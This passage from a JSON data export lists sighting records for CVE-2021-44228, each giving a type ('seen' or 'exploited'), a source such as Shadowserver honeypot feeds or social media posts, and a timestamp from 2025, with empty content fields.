"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "3da06e9b-ab94-476a-b248-707f490d9df9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-26)", "content": "", "creation_timestamp": "2025-02-26T00:00:00.000000Z"}, {"uuid": "9ae10d2f-d00a-4768-ada2-b431d10019ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-14)", "content": "", "creation_timestamp": "2025-02-14T00:00:00.000000Z"}, {"uuid": "5e9a7425-f268-4388-80a0-cc6c6dde6047", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-13)", "content": "", "creation_timestamp": "2025-03-13T00:00:00.000000Z"}, {"uuid": "63d4f6c8-d616-4102-843e-a18f662e8516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "7343e347-0cc5-44d0-9c3e-c0216407d246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "c16664db-8a7f-4805-8b9c-46dffae4194f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-20)", "content": "", "creation_timestamp": "2025-03-20T00:00:00.000000Z"}, {"uuid": "37d1f948-9388-4ebf-a5a2-ef3e12bd8082", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-13)", "content": "", "creation_timestamp": "2025-02-13T00:00:00.000000Z"}, {"uuid": "d9ab8362-defa-4a65-9d68-6d83a4cf48f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-25)", "content": "", "creation_timestamp": "2025-03-25T00:00:00.000000Z"}, {"uuid": "9ac2b2c3-58fb-4b19-b40d-437367d4a21d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "b0f4921f-0de5-4b15-9ce6-109cc1e94bdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lid565ueus2c", "content": "", "creation_timestamp": "2025-02-16T21:06:33.336223Z"}, {"uuid": "16e13fec-aa78-4fd2-9268-4e38a2bebddf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-16)", "content": "", "creation_timestamp": "2025-02-16T00:00:00.000000Z"}, {"uuid": "18d35d55-157c-4644-a312-1424c513338f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "8144657e-d0af-458e-afe6-1cf1653bde83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-07)", "content": "", "creation_timestamp": "2025-03-07T00:00:00.000000Z"}, {"uuid": "63bcd2f9-734e-4fed-bd5a-962daf2b8c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-10)", "content": "", "creation_timestamp": "2025-03-10T00:00:00.000000Z"}, {"uuid": "4a0e5e3f-b33a-4fd0-8db8-fa996ed01d5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-16)", "content": "", "creation_timestamp": "2025-03-16T00:00:00.000000Z"}, {"uuid": "51edad89-f464-4366-a04c-e1afa05354ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "365a3b6f-db31-43b9-b3d3-3a2080318177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-12)", "content": "", "creation_timestamp": "2025-03-12T00:00:00.000000Z"}, {"uuid": "b7f50ef7-6bec-4e32-bad1-9a5682ee9015", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-16)", "content": "", "creation_timestamp": "2025-02-16T00:00:00.000000Z"}, {"uuid": "c5b23225-3948-4fa2-9ec9-c9b11d9e40d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lief267h7v42", "content": "", "creation_timestamp": "2025-02-17T09:01:25.445547Z"}, {"uuid": "dd632d68-f675-4dd0-9a04-03cc0d1faf90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-17)", "content": "", "creation_timestamp": "2025-02-17T00:00:00.000000Z"}, {"uuid": "a32c8c33-f88b-4222-8cd4-02ce956ac421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lietfablet27", "content": "", "creation_timestamp": "2025-02-17T13:16:52.669324Z"}, {"uuid": "d4989f3c-f3f4-427e-a9e1-a0409f0df5f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-07)", "content": "", "creation_timestamp": "2025-03-07T00:00:00.000000Z"}, {"uuid": "a2338476-af6c-4d4d-bf5c-acbdf36d6fc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-24)", "content": "", "creation_timestamp": "2025-03-24T00:00:00.000000Z"}, {"uuid": "2d834fd3-4e92-407d-87b1-5ac5bdc9f762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-17)", "content": "", "creation_timestamp": "2025-02-17T00:00:00.000000Z"}, {"uuid": "76457714-9339-4b49-9723-6d1550c6ab3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-18)", "content": "", "creation_timestamp": "2025-02-18T00:00:00.000000Z"}, {"uuid": "2a0ec114-73d9-4625-9c2d-5b91abec3503", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-18)", "content": "", "creation_timestamp": "2025-02-18T00:00:00.000000Z"}, {"uuid": "288809ac-3336-4973-95bf-a1397a4bf8e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-19)", "content": "", "creation_timestamp": "2025-03-19T00:00:00.000000Z"}, {"uuid": "56910251-ab9f-470f-8f56-d5c35d322349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-20)", "content": "", "creation_timestamp": "2025-02-20T00:00:00.000000Z"}, {"uuid": "897281fd-2d7f-49a8-8233-e215c7ee5cb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-19)", "content": "", "creation_timestamp": "2025-02-19T00:00:00.000000Z"}, {"uuid": "2a54756f-46fd-450d-aad4-b65a7bcd0bbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-19)", "content": "", "creation_timestamp": "2025-02-19T00:00:00.000000Z"}, {"uuid": "8d7a56be-0269-46ee-988a-d03758cca3f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-11)", "content": "", "creation_timestamp": "2025-03-11T00:00:00.000000Z"}, {"uuid": "d2909eae-8b0a-4615-b2fe-3bc13c338813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-21)", "content": "", "creation_timestamp": "2025-02-21T00:00:00.000000Z"}, {"uuid": "de72f62d-23db-4cd0-b8c1-fa023453f28e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-22)", "content": "", "creation_timestamp": "2025-03-22T00:00:00.000000Z"}, {"uuid": "149a4f52-8ba1-483a-86f1-2d1b0a01706b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-20)", "content": "", "creation_timestamp": "2025-03-20T00:00:00.000000Z"}, {"uuid": "fb1775af-ec7e-4d67-ab79-a415c87aecda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-23)", "content": "", "creation_timestamp": "2025-02-23T00:00:00.000000Z"}, {"uuid": "2fa66e5b-cba9-4d72-a008-3e2e41135d15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-23)", "content": "", "creation_timestamp": "2025-02-23T00:00:00.000000Z"}, {"uuid": "264529c0-7e35-48e9-9525-86df3111ff6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:32.000000Z"}, {"uuid": "b0919c85-a14e-4e4c-8800-2b2baf698921", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-28)", "content": "", "creation_timestamp": "2025-02-28T00:00:00.000000Z"}, {"uuid": "c57d87fa-6bba-46a0-8aba-d844154ef33f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-21)", "content": "", "creation_timestamp": "2025-03-21T00:00:00.000000Z"}, {"uuid": "54bd4957-e73e-4c45-b4bd-d02fc63480a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-17)", "content": "", "creation_timestamp": "2025-03-17T00:00:00.000000Z"}, {"uuid": "bc496054-4660-41eb-8b44-2fe904c7b851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-424ebad0-6bee0cbd5f75d218", "content": "", "creation_timestamp": "2025-03-03T06:58:05.232699Z"}, {"uuid": "94054672-6196-431f-a321-4b50b883e77c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-01)", "content": "", "creation_timestamp": "2025-03-01T00:00:00.000000Z"}, {"uuid": "3e9dddd9-2f86-4bd0-acb8-046096ce7904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://gist.github.com/Mcpoowl/6b0fbc966f61d78dc29f144d738bf5af", "content": "", "creation_timestamp": "2025-03-06T08:47:03.000000Z"}, {"uuid": "4ce274c4-049c-4351-a92a-cb9ef6be4ca3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-08)", "content": "", "creation_timestamp": "2025-03-08T00:00:00.000000Z"}, {"uuid": "1a309464-e90c-4f1f-8092-46c11e2b2844", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "5791764c-e202-4167-b111-616c995e15c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-25)", "content": "", "creation_timestamp": "2025-02-25T00:00:00.000000Z"}, {"uuid": "69e2be1e-a862-4f72-92aa-05a1bc4d87c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-02)", "content": "", "creation_timestamp": "2025-03-02T00:00:00.000000Z"}, {"uuid": "ca75dcef-7d75-4e85-b388-9aab2739ed39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-31)", "content": "", "creation_timestamp": "2025-03-31T00:00:00.000000Z"}, {"uuid": "c605f181-0c06-4a6b-897b-972937ae7c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-06)", "content": "", "creation_timestamp": "2025-03-06T00:00:00.000000Z"}, {"uuid": "93232e2d-c4a3-46c9-b9cd-8cbae21065e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-27)", "content": "", "creation_timestamp": "2025-03-27T00:00:00.000000Z"}, {"uuid": "cb03631c-7404-4e80-afe0-35192594706f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-01)", "content": "", "creation_timestamp": "2025-04-01T00:00:00.000000Z"}, {"uuid": "fb6fa568-c1c2-4d31-a396-00fcb1bc8a24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-02)", "content": "", "creation_timestamp": "2025-04-02T00:00:00.000000Z"}, {"uuid": "7ae463f7-9704-4c7e-a627-dc9a21d1438c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-28)", "content": "", "creation_timestamp": "2025-03-28T00:00:00.000000Z"}, {"uuid": "be8b9c49-d96e-4577-89be-657f1d4aca79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-04)", "content": "", "creation_timestamp": "2025-04-04T00:00:00.000000Z"}, {"uuid": "96aed7df-f2dc-40f0-85f7-db760ce81748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-14)", "content": "", "creation_timestamp": "2025-07-14T00:00:00.000000Z"}, {"uuid": "099c29ea-4f1b-41b6-9eeb-5ef5d98f87e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-03)", "content": "", "creation_timestamp": "2025-04-03T00:00:00.000000Z"}, {"uuid": "7140fe11-595d-44d2-9bff-fa90177a00da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-21)", "content": "", "creation_timestamp": "2025-06-21T00:00:00.000000Z"}, {"uuid": "41f5c3a5-3bfc-411b-b016-277634440d50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-18)", "content": "", "creation_timestamp": "2025-05-18T00:00:00.000000Z"}, {"uuid": "a8eae859-d388-4026-9c61-d2345b2c152c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-05)", "content": "", "creation_timestamp": "2025-04-05T00:00:00.000000Z"}, {"uuid": "39d47a08-1914-4b4d-9988-1816b08832c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-07)", "content": "", "creation_timestamp": "2025-04-07T00:00:00.000000Z"}, {"uuid": "b116780f-d285-405d-927a-ee778c1716c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-06)", "content": "", "creation_timestamp": "2025-04-06T00:00:00.000000Z"}, {"uuid": "dae0d182-7c9b-4691-a44f-b83ad5d8b823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-24)", "content": "", "creation_timestamp": "2025-06-24T00:00:00.000000Z"}, {"uuid": "7c14484b-9ece-4f25-9ba2-211a0d815e33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-23)", "content": "", "creation_timestamp": "2025-05-23T00:00:00.000000Z"}, {"uuid": "e5fead9b-1ef6-449b-b946-78c3d4776f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-09)", "content": "", "creation_timestamp": "2025-04-09T00:00:00.000000Z"}, {"uuid": "78350c65-fc55-4411-85e7-0b86dbaae785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-08)", "content": "", "creation_timestamp": "2025-04-08T00:00:00.000000Z"}, {"uuid": "1e725a0b-9106-41f2-9eaa-1ebca91eadab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-11)", "content": "", "creation_timestamp": "2025-04-11T00:00:00.000000Z"}, {"uuid": "48fca9d4-0129-43d5-9167-bfcaa5fb1121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/letspartytilldawn.bsky.social/post/3lpwaprsvd223", "content": "", "creation_timestamp": "2025-05-24T13:27:02.435521Z"}, {"uuid": "af9c0f37-975e-423d-96ce-802fbb903b90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-10)", "content": "", "creation_timestamp": "2025-04-10T00:00:00.000000Z"}, {"uuid": "46f8ea62-d1f6-4abf-b023-b9419b78b7ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-07)", "content": "", "creation_timestamp": "2025-06-07T00:00:00.000000Z"}, {"uuid": "03d33f51-c09e-4d9d-8886-547ab3255180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lpq2g3g3uw2u", "content": "", "creation_timestamp": "2025-05-22T02:18:16.304556Z"}, {"uuid": "894a99d8-1000-460b-80c1-c83c285444a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-13)", "content": "", "creation_timestamp": "2025-04-13T00:00:00.000000Z"}, {"uuid": "8c962ba7-4e30-4a2b-9b07-45e4da1ad3bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-17)", "content": "", "creation_timestamp": "2025-06-17T00:00:00.000000Z"}, {"uuid": "6a9bdc1b-0d55-4eef-9937-9581d0c64841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": 